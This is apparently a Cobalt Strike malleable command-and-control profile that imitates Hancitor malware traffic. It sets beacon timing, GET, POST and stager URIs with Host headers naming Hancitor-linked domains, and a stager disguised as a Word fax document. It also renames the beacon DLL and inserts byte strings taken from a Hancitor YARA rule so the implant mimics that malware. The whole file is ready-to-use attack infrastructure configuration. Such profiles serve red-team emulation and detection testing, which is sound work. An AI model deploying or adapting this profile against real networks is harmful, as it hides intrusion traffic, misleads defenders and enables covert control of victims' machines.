143 lines
2.8 KiB
Plaintext
143 lines
2.8 KiB
Plaintext
|
#hancitor
|
||
|
#taken from --> http://www.malware-traffic-analysis.net/2017/12/20/index.html
|
||
|
#xx0hcd
|
||
|
|
||
|
|
||
|
set sleeptime "30000";
|
||
|
set jitter "20";
|
||
|
set useragent "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko)";
|
||
|
set dns_idle "8.8.8.8";
|
||
|
set maxdns "235";
|
||
|
|
||
|
|
||
|
http-get {
|
||
|
|
||
|
set uri "/mlu/forum.php";
|
||
|
|
||
|
client {
|
||
|
|
||
|
header "Host" "arrepsinrab.com";
|
||
|
header "Accept" "*/*";
|
||
|
header "Accept-Encoding" "identity, *;q=0";
|
||
|
header "Accept-Language" "en-US";
|
||
|
header "Content-Type" "application/octet-stream";
|
||
|
header "Connection" "close";
|
||
|
header "Content-Encoding" "binary";
|
||
|
|
||
|
|
||
|
metadata {
|
||
|
netbios;
|
||
|
header "Cookie";
|
||
|
|
||
|
|
||
|
}
|
||
|
|
||
|
|
||
|
}
|
||
|
|
||
|
server {
|
||
|
|
||
|
header "Server" "nginx/1.10.2";
|
||
|
header "Content-Type" "text/html";
|
||
|
header "Keep-Alive" "timeout=2, max=100";
|
||
|
header "Connection" "close";
|
||
|
header "X-Powered-By" "PHP/5.4.45";
|
||
|
|
||
|
|
||
|
output {
|
||
|
netbios;
|
||
|
print;
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
|
||
|
http-post {
|
||
|
|
||
|
set uri "/ls5/forum.php";
|
||
|
|
||
|
client {
|
||
|
|
||
|
header "Accept" "*/*";
|
||
|
header "Content-Type" "application/x-www-form-urlencoded";
|
||
|
header "Host" "gedidnundno.com";
|
||
|
header "Cache-Control" "no-cache";
|
||
|
|
||
|
output {
|
||
|
netbios;
|
||
|
print;
|
||
|
|
||
|
}
|
||
|
|
||
|
|
||
|
id {
|
||
|
netbiosu;
|
||
|
header "GUID";
|
||
|
|
||
|
}
|
||
|
}
|
||
|
|
||
|
server {
|
||
|
|
||
|
header "Server" "nginx/1.10.2";
|
||
|
header "Content-Type" "text/html";
|
||
|
header "Transfer-Encoding" "chunked";
|
||
|
header "Connection" "keep-alive";
|
||
|
header "X-Powered-By" "PHP/5.4.45";
|
||
|
|
||
|
|
||
|
output {
|
||
|
netbios;
|
||
|
print;
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
|
||
|
http-stager {
|
||
|
|
||
|
set uri_x86 "/lS5/forum.php";
|
||
|
set uri_x64 "/ls5/Forum.php";
|
||
|
|
||
|
client {
|
||
|
header "Accept" "text/html, application/xhtml+xml, */*";
|
||
|
header "Accept-Language" "en-US";
|
||
|
header "Host" "acamonitoringltd.ca";
|
||
|
header "Connection" "Keep-Alive";
|
||
|
}
|
||
|
|
||
|
server {
|
||
|
header "Server" "nginx";
|
||
|
header "Content-Type" "application/msword;";
|
||
|
header "Keep-Alive" "timeout=2, max=100";
|
||
|
header "Connection" "Keep-Alive";
|
||
|
header "X-Powered-By" "PHP/5.3.3";
|
||
|
header "Content-Disposition" "attachment; filename=fax_286509.doc";
|
||
|
header "Pragma" "private";
|
||
|
|
||
|
}
|
||
|
|
||
|
|
||
|
}
|
||
|
|
||
|
stage {
|
||
|
#random
|
||
|
set compile_time "15 Nov 2017 12:24:14";
|
||
|
set userwx "false";
|
||
|
set image_size_x86 "301000";
|
||
|
|
||
|
#https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html
|
||
|
transform-x86 {
|
||
|
strrep "beacon.dll" "pm.dll";
|
||
|
}
|
||
|
|
||
|
transform-x64 {
|
||
|
strrep "beacon.x64.dll" "PM.dll";
|
||
|
}
|
||
|
|
||
|
#https://github.com/Yara-Rules/rules/blob/d1da9c002d1d00045f53ea1502cfcc7dd43c115e/Malicious_Documents/Maldoc_hancitor_dropper
|
||
|
stringw "{ 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 }";
|
||
|
stringw "{ 00 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 00 }";
|
||
|
stringw "{ 00 43 61 6C 6C 57 69 6E 64 6F 77 50 72 6F 63 41 00 }";
|
||
|
stringw "{ 50 4F 4C 41 }";
|
||
|
|
||
|
}
|